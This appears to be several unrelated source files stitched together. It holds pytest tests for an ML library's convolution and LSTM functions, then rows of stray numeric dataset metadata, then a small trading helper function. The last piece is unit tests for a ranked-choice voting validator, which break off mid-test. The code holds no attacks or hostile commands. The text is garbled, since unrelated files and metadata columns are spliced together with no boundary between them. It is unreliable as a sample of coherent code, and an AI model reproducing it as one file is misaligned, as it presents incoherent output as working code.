@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_depthwise_conv2d(x_n_filters_n_pad_n_res, dtype, tensor_fn, device, call):
if call in [helpers.tf_call, helpers.tf_graph_call] and "cpu" in device:
# tf depthwise conv2d does not work when CUDA is installed, but array is on CPU
pytest.skip()
# smoke test
if call in [helpers.np_call, helpers.jnp_call]:
# numpy and jax do not yet support depthwise 2d convolutions
pytest.skip()
x, filters, padding, true_res = x_n_filters_n_pad_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.depthwise_conv2d(x, filters, 1, padding)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(
call(ivy.depthwise_conv2d, x, filters, 1, padding), ivy.to_numpy(true_res)
)
# conv3d
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_res",
[
(
[
[
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
]
],
[
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
[
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
],
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
],
"SAME",
[
[
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
[
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
],
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
]
],
),
(
[
[
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
]
for _ in range(5)
],
[
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
[
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
],
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
],
"SAME",
[
[
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
[
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
],
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
]
for _ in range(5)
],
),
(
[
[
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
]
],
[
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
[
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
],
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
],
"VALID",
[[[[[3.0]]]]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_conv3d(x_n_filters_n_pad_n_res, dtype, tensor_fn, device, call):
if call in [helpers.tf_call, helpers.tf_graph_call] and "cpu" in device:
# tf conv3d does not work when CUDA is installed, but array is on CPU
pytest.skip()
# smoke test
if call in [helpers.np_call, helpers.jnp_call]:
# numpy and jax do not yet support 3d convolutions
pytest.skip()
x, filters, padding, true_res = x_n_filters_n_pad_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.conv3d(x, filters, 1, padding)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(call(ivy.conv3d, x, filters, 1, padding), ivy.to_numpy(true_res))
# conv3d_transpose
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_outshp_n_res",
[
(
[
[
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
]
],
[
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
[
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
],
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
],
"SAME",
(1, 3, 3, 3, 1),
[
[
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
[
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
],
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
]
],
),
(
[
[
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
]
for _ in range(5)
],
[
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
[
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
],
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
],
"SAME",
(5, 3, 3, 3, 1),
[
[
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
[
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
[[3.0], [3.0], [3.0]],
],
[
[[0.0], [0.0], [0.0]],
[[3.0], [3.0], [3.0]],
[[0.0], [0.0], [0.0]],
],
]
for _ in range(5)
],
),
(
[
[
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0]],
],
]
],
[
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
[
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
],
[
[[[0.0]], [[0.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[0.0]], [[0.0]]],
],
],
"VALID",
(1, 5, 5, 5, 1),
[
[
[
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [3.0], [3.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [3.0], [3.0], [3.0], [0.0]],
[[0.0], [3.0], [3.0], [3.0], [0.0]],
[[0.0], [3.0], [3.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [3.0], [3.0], [3.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
],
[
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
],
]
],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_conv3d_transpose(
x_n_filters_n_pad_n_outshp_n_res, dtype, tensor_fn, device, call
):
if call in [helpers.tf_call, helpers.tf_graph_call] and "cpu" in device:
# tf conv3d transpose does not work when CUDA is installed, but array is on CPU
pytest.skip()
# smoke test
if call in [helpers.np_call, helpers.jnp_call, helpers.mx_call]:
# numpy and jax do not yet support 3d transpose convolutions, and mxnet only
# supports with CUDNN
pytest.skip()
if call in [helpers.mx_call] and "cpu" in device:
# mxnet only supports 3d transpose convolutions with CUDNN
pytest.skip()
x, filters, padding, output_shape, true_res = x_n_filters_n_pad_n_outshp_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.conv3d_transpose(x, filters, 1, padding, output_shape)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(
call(ivy.conv3d_transpose, x, filters, 1, padding, output_shape),
ivy.to_numpy(true_res),
)
# LSTM #
# -----#
# lstm
@pytest.mark.parametrize(
"b_t_ic_hc_otf_sctv",
[
(
2,
3,
4,
5,
[0.93137765, 0.9587628, 0.96644664, 0.93137765, 0.9587628, 0.96644664],
3.708991,
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_lstm(b_t_ic_hc_otf_sctv, dtype, tensor_fn, device, call):
# smoke test
(
b,
t,
input_channels,
hidden_channels,
output_true_flat,
state_c_true_val,
) = b_t_ic_hc_otf_sctv
x = ivy.asarray(
ivy.linspace(ivy.zeros([b, t]), ivy.ones([b, t]), input_channels), "float32"
)
init_h = ivy.ones([b, hidden_channels])
init_c = ivy.ones([b, hidden_channels])
kernel = ivy.variable(ivy.ones([input_channels, 4 * hidden_channels])) * 0.5
recurrent_kernel = (
ivy.variable(ivy.ones([hidden_channels, 4 * hidden_channels])) * 0.5
)
output, state_c = ivy.lstm_update(x, init_h, init_c, kernel, recurrent_kernel)
# type test
assert ivy.is_ivy_array(output)
assert ivy.is_ivy_array(state_c)
# cardinality test
assert output.shape == (b, t, hidden_channels)
assert state_c.shape == (b, hidden_channels)
# value test
output_true = np.tile(
np.asarray(output_true_flat).reshape((b, t, 1)), (1, 1, hidden_channels)
)
state_c_true = np.ones([b, hidden_channels]) * state_c_true_val
output, state_c = call(ivy.lstm_update, x, init_h, init_c, kernel, recurrent_kernel)
assert np.allclose(output, output_true, atol=1e-6)
assert np.allclose(state_c, state_c_true, atol=1e-6)
| 33.72327
| 89
| 0.352139
| 4,151
| 32,172
| 2.597928
| 0.051313
| 0.194918
| 0.252596
| 0.29043
| 0.843843
| 0.81148
| 0.793954
| 0.776614
| 0.759644
| 0.748053
| 0
| 0.12708
| 0.422759
| 32,172
| 953
| 90
| 33.758657
| 0.45361
| 0.059026
| 0
| 0.633971
| 0
| 0
| 0.021379
| 0.006961
| 0
| 0
| 0
| 0
| 0.046651
| 1
| 0.014354
| false
| 0
| 0.007177
| 0
| 0.022727
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c35eb77065fa3969c70af036e02030d1d53cf645
| 202
|
py
|
Python
|
examples/common/candle.py
|
preduus/python-trading
|
1e103c42399ddcf1a1a3c5698eaa1c8e38b23075
|
[
"BSD-3-Clause"
] | 2
|
2022-02-05T01:26:32.000Z
|
2022-03-11T05:53:31.000Z
|
examples/common/candle.py
|
preduus/python-trading
|
1e103c42399ddcf1a1a3c5698eaa1c8e38b23075
|
[
"BSD-3-Clause"
] | null | null | null |
examples/common/candle.py
|
preduus/python-trading
|
1e103c42399ddcf1a1a3c5698eaa1c8e38b23075
|
[
"BSD-3-Clause"
] | 1
|
2022-01-28T12:23:38.000Z
|
2022-01-28T12:23:38.000Z
|
from typing import Union
def get_candle_type(close_price: float, open_price: float) -> Union[str, None]:
return "buy" if close_price > open_price else "sell" if close_price < open_price else None
| 33.666667
| 94
| 0.757426
| 33
| 202
| 4.393939
| 0.575758
| 0.206897
| 0.165517
| 0.22069
| 0.344828
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158416
| 202
| 5
| 95
| 40.4
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0.034653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c36376368cab74199d0a544c46b75e1a2d777caf
| 16,937
|
py
|
Python
|
tests/unit/test_validate.py
|
DavidCary/CA-SB1288
|
40516440aefef745e783ecd57711d5e6925975c5
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_validate.py
|
DavidCary/CA-SB1288
|
40516440aefef745e783ecd57711d5e6925975c5
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_validate.py
|
DavidCary/CA-SB1288
|
40516440aefef745e783ecd57711d5e6925975c5
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding=utf-8 -*-
# Copyright 2016 David Cary; licensed under the Apache License, Version 2.0
import sys
import unittest
import _test_aids
from _src import sb1288
from sb1288 import validate
from sb1288 import errors
from sb1288.constants import Decimal
ONE = Decimal(1)
import re
def sample_options_function(parms, result):
return 'Y'
class TestValidate(unittest.TestCase):
"""Test the validate module"""
def test_str_tuple_from_str(self):
self.assertEqual(validate.str_tuple(''), tuple())
self.assertEqual(validate.str_tuple(' '), ('',))
self.assertEqual(validate.str_tuple('#'), ('',))
self.assertEqual(validate.str_tuple(' A'), ('A',))
self.assertEqual(validate.str_tuple(' AA'), ('AA',))
self.assertEqual(validate.str_tuple(' A B'), ('A', 'B'))
self.assertEqual(validate.str_tuple(' A B'), ('A', '', 'B'))
self.assertEqual(validate.str_tuple('|A|B'), ('A', 'B'))
def test_str_tuple_from_list(self):
self.assertEqual(validate.str_tuple([]), tuple())
self.assertEqual(validate.str_tuple(['']), ('',))
self.assertEqual(validate.str_tuple(['#']), ('#',))
self.assertEqual(validate.str_tuple(['AA']), ('AA',))
self.assertEqual(validate.str_tuple(['A', 'B']), ('A', 'B'))
self.assertEqual(validate.str_tuple(['A', '', 'B']), ('A', '', 'B'))
_test_aids.assertRaises_with_message(self, TypeError,
'Item in list is not a str:',
validate.str_tuple, (['A', 7, 'B'],))
def test_str_tuple_from_tuple(self):
self.assertEqual(validate.str_tuple(tuple()), tuple())
self.assertEqual(validate.str_tuple(('',)), ('',))
self.assertEqual(validate.str_tuple(('#',)), ('#',))
self.assertEqual(validate.str_tuple(('AA',)), ('AA',))
self.assertEqual(validate.str_tuple(('A', 'B')), ('A', 'B'))
self.assertEqual(validate.str_tuple(('A', '', 'B')), ('A', '', 'B'))
_test_aids.assertRaises_with_message(self, TypeError,
'Item in tuple is not a str:',
validate.str_tuple, (('A', 7, 'B'),))
def test_str_tuple_from_other(self):
type_type = 'type' if sys.version_info.major == 2 else 'class'
_test_aids.assertRaises_with_message(self, TypeError,
'Can not make a str_tuple from a <' + type_type + ' \'set\'>.',
validate.str_tuple, (set(('A', 7, 'B')),))
def test_nbr_seats_to_fill_valid(self):
self.assertEqual(validate.nbr_seats_to_fill(1), 1)
self.assertEqual(validate.nbr_seats_to_fill(2), 2)
self.assertEqual(validate.nbr_seats_to_fill(3), 3)
self.assertEqual(validate.nbr_seats_to_fill(4), 4)
self.assertEqual(validate.nbr_seats_to_fill(5), 5)
self.assertEqual(validate.nbr_seats_to_fill(1020), 1020)
def test_nbr_seats_to_fill_invalid(self):
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'nbr_seats_to_fill not an int:',
validate.nbr_seats_to_fill, ('two',))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'nbr_seats_to_fill not >= 1:',
validate.nbr_seats_to_fill, (0,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'nbr_seats_to_fill not >= 1:',
validate.nbr_seats_to_fill, (-1,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'nbr_seats_to_fill not >= 1:',
validate.nbr_seats_to_fill, (-2,))
def test_candidates_valid(self):
self.assertEqual(validate.candidates(()), ())
self.assertEqual(validate.candidates([]), ())
self.assertEqual(validate.candidates(''), ())
self.assertEqual(validate.candidates(('A',)), ('A',))
self.assertEqual(validate.candidates(('B', 'A')), ('B', 'A'))
self.assertEqual(validate.candidates(('B', 'C', 'A')), ('B', 'C', 'A'))
self.assertEqual(validate.candidates(
('B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L')),
('B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L'))
self.assertEqual(validate.candidates(['A']), ('A',))
self.assertEqual(validate.candidates(['B', 'A']), ('B', 'A'))
self.assertEqual(validate.candidates(['B', 'C', 'A']), ('B', 'C', 'A'))
self.assertEqual(validate.candidates(
['B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L']),
('B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L'))
self.assertEqual(validate.candidates(' A'), ('A',))
self.assertEqual(validate.candidates(' B A'), ('B', 'A'))
self.assertEqual(validate.candidates(' B C A'), ('B', 'C', 'A'))
self.assertEqual(validate.candidates(
' B C A I H G F E D J K L'),
('B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L'))
self.assertEqual(validate.candidates(
',Joe Smith,John Doe'),
('Joe Smith', 'John Doe'))
self.assertEqual(validate.candidates(
';Smith, Joe;Doe, John'),
('Smith, Joe', 'Doe, John'))
def test_candidates_invalid(self):
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidates type:',
validate.candidates, (17,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name:',
validate.candidates, (('A', ''),))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name:',
validate.candidates, (('A', '#'),))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name:',
validate.candidates, (('A', ':who'),))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Candidate names are not unique.',
validate.candidates, (('A', 'B', 'A'),))
def test_tie_breaker_valid(self):
candidates = ('B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L',
'Joe Smith', 'John Doe', 'Smith, Joe', 'Doe, John')
self.assertEqual(validate.tie_breaker((), candidates), {})
self.assertEqual(validate.tie_breaker([], candidates), {})
self.assertEqual(validate.tie_breaker('', candidates), {})
self.assertEqual(validate.tie_breaker(('A',), candidates), {'A': 0})
self.assertEqual(validate.tie_breaker(
('B', 'A'), candidates),
{'B': 0, 'A': 1})
self.assertEqual(validate.tie_breaker(
('B', 'C', 'A'), candidates),
{'B': 0, 'C': 1, 'A': 2})
self.assertEqual(validate.tie_breaker(
('B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L'),
candidates),
{'B': 0, 'C': 1, 'A': 2, 'I': 3, 'H': 4, 'G': 5, 'F': 6, 'E': 7,
'D': 8, 'J': 9, 'K': 10, 'L': 11})
self.assertEqual(validate.tie_breaker(['A'], candidates), {'A': 0})
self.assertEqual(validate.tie_breaker(
['B', 'A'], candidates),
{'B': 0, 'A': 1})
self.assertEqual(validate.tie_breaker(
['B', 'C', 'A'], candidates),
{'B': 0, 'C': 1, 'A': 2})
self.assertEqual(validate.tie_breaker(
['B', 'C', 'A', 'I', 'H', 'G', 'F', 'E', 'D', 'J', 'K', 'L'],
candidates),
{'B': 0, 'C': 1, 'A': 2, 'I': 3, 'H': 4, 'G': 5, 'F': 6, 'E': 7,
'D': 8, 'J': 9, 'K': 10, 'L': 11})
self.assertEqual(validate.tie_breaker(' A', candidates), {'A': 0})
self.assertEqual(validate.tie_breaker(' B A', candidates),
{'B': 0, 'A': 1})
self.assertEqual(validate.tie_breaker(' B C A', candidates),
{'B': 0, 'C': 1, 'A': 2})
self.assertEqual(validate.tie_breaker(
' B C A I H G F E D J K L', candidates),
{'B': 0, 'C': 1, 'A': 2, 'I': 3, 'H': 4, 'G': 5, 'F': 6, 'E': 7,
'D': 8, 'J': 9, 'K': 10, 'L': 11})
self.assertEqual(validate.tie_breaker(
',Joe Smith,John Doe', candidates),
{'Joe Smith': 0, 'John Doe': 1})
self.assertEqual(validate.tie_breaker(
';Smith, Joe;Doe, John', candidates),
{'Smith, Joe': 0, 'Doe, John': 1})
def test_tie_breaker_invalid(self):
candidates = ('A', 'C')
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid tie_breaker type:',
validate.tie_breaker, (17, candidates))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name in tie_breaker:',
validate.tie_breaker, (('A', 'B'), candidates))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name in tie_breaker:',
validate.tie_breaker, (('A', ''), candidates))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name in tie_breaker:',
validate.tie_breaker, (('A', '#'), candidates))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid candidate name in tie_breaker:',
validate.tie_breaker, (('A', ':who'), candidates))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Candidate names in tie_breaker are not unique.',
validate.tie_breaker, (('A', 'C', 'A'), candidates))
def test_ballots_valid(self):
candidates = validate.str_tuple(' A B C D E F G H I J K L')
self.assertEqual(validate.ballots((), candidates, 3), ())
self.assertEqual(validate.ballots([], candidates, 3), ())
self.assertEqual(repr(validate.ballots(
((5, ('A',)),), candidates, 3)),
"((5, 1.00000, ('A',)),)")
self.assertEqual(repr(validate.ballots(
[[5, ['A',]],], candidates, 3)),
"((5, 1.00000, ('A',)),)")
self.assertEqual(repr(validate.ballots(
[[5, ' A'],], candidates, 3)),
"((5, 1.00000, ('A',)),)")
self.assertEqual(repr(validate.ballots(
[(3, ' A B'), (5, ' B A'),], candidates, 3)),
"((3, 1.00000, ('A', 'B')), (5, 1.00000, ('B', 'A')))")
self.assertEqual(repr(validate.ballots(
[(3, ' A B'), (5, ' B # A'),], candidates, 3)),
"((3, 1.00000, ('A', '', 'B')), (5, 1.00000, ('B', '#', 'A')))")
self.assertEqual(repr(validate.ballots(
[(3, ' A B'), (5, ' A'),], candidates, 4)),
"((3, 1.00000, ('A', '', '', 'B')), (5, 1.00000, ('', '', 'A')))")
self.assertEqual(repr(validate.ballots(
[(3, ' A B'), (5, ' A'),], candidates, None)),
"((3, 1.00000, ('A', '', '', 'B')), (5, 1.00000, ('', '', 'A')))")
self.assertEqual(repr(validate.ballots(
[(3, ''), (5, ' #'),], candidates, 3)),
"((3, 1.00000, ()), (5, 1.00000, ('#',)))")
self.assertEqual(repr(validate.ballots(
[(3, ' A B C D E F G H I J K L'),
(5, ' L K J I H G F E D C B A'),], candidates, 12)),
"((3, 1.00000, ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'" +
", 'J', 'K', 'L'))," +
" (5, 1.00000, ('L', 'K', 'J', 'I', 'H', 'G', 'F', 'E', 'D'" +
", 'C', 'B', 'A')))")
self.assertEqual(repr(validate.ballots(
[(3, ' A B C D E F G H I J K L'),
(5, ' L K J I H G F E D C B A'),], candidates, None)),
"((3, 1.00000, ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'" +
", 'J', 'K', 'L'))," +
" (5, 1.00000, ('L', 'K', 'J', 'I', 'H', 'G', 'F', 'E', 'D'" +
", 'C', 'B', 'A')))")
def test_ballots_invalid(self):
candidates = validate.str_tuple(' A B C D E F G H I J K L')
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'ballots is not a list or tuple:',
validate.ballots, (' A B', candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'A ballot is not a list or tuple:',
validate.ballots, ((' A B',), candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'A ballot is not a pair of values:',
validate.ballots, ([('A', 'B', 'C')], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'A ballot multiple is not an int:',
validate.ballots, ([(0.12,' A B C')], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'A ballot multiple is zero or less:',
validate.ballots, ([(-1,' A B C')], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'A ballot multiple is zero or less:',
validate.ballots, ([(0,' A B C')], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid ballot rankings type:',
validate.ballots, ([(1, 77)], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid ballot rankings type:',
validate.ballots, ([(2, ('A', 77))], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Ballot rankings is too long:',
validate.ballots, ([(2, ' A B C D')], candidates, 3))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid ballot ranking code:',
validate.ballots, ([(2, ('A', 'Z'))], candidates, 3))
def test_max_ranking_levels_valid(self):
self.assertEqual(validate.max_ranking_levels(3), 3)
self.assertEqual(validate.max_ranking_levels(4), 4)
self.assertEqual(validate.max_ranking_levels(5), 5)
self.assertEqual(validate.max_ranking_levels(1020), 1020)
self.assertEqual(validate.max_ranking_levels(None), None)
def test_max_ranking_levels_invalid(self):
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'max_ranking_levels not an int:',
validate.max_ranking_levels, ('two',))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'max_ranking_levels is less than 3:',
validate.max_ranking_levels, (2,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'max_ranking_levels is less than 3:',
validate.max_ranking_levels, (1,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'max_ranking_levels is less than 3:',
validate.max_ranking_levels, (0,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'max_ranking_levels is less than 3:',
validate.max_ranking_levels, (-1,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'max_ranking_levels is less than 3:',
validate.max_ranking_levels, (-2,))
def test_options_valid(self):
self.assertEqual(validate.options({}), {})
self.assertEqual(validate.options(
{'stop_at_majority': True}),
{'stop_at_majority': True})
self.assertEqual(validate.options(
{'stop_at_majority': False}),
{'stop_at_majority': False})
self.assertEqual(validate.options(
{'alternative_defeats': 'Y'}),
{'alternative_defeats': 'Y'})
self.assertEqual(validate.options(
{'alternative_defeats': 'y'}),
{'alternative_defeats': 'Y'})
self.assertEqual(validate.options(
{'alternative_defeats': 'N'}),
{'alternative_defeats': 'N'})
self.assertEqual(validate.options(
{'alternative_defeats': ('y', 'n', 'y', 'Y')}),
{'alternative_defeats': ('Y', 'N', 'Y', 'Y')})
self.assertEqual(validate.options(
{'alternative_defeats': ['y', 'n', 'N']}),
{'alternative_defeats': ('Y', 'N', 'N')})
self.assertEqual(validate.options(
{'alternative_defeats': ' y n N Y'}),
{'alternative_defeats': ('Y', 'N', 'N', 'Y')})
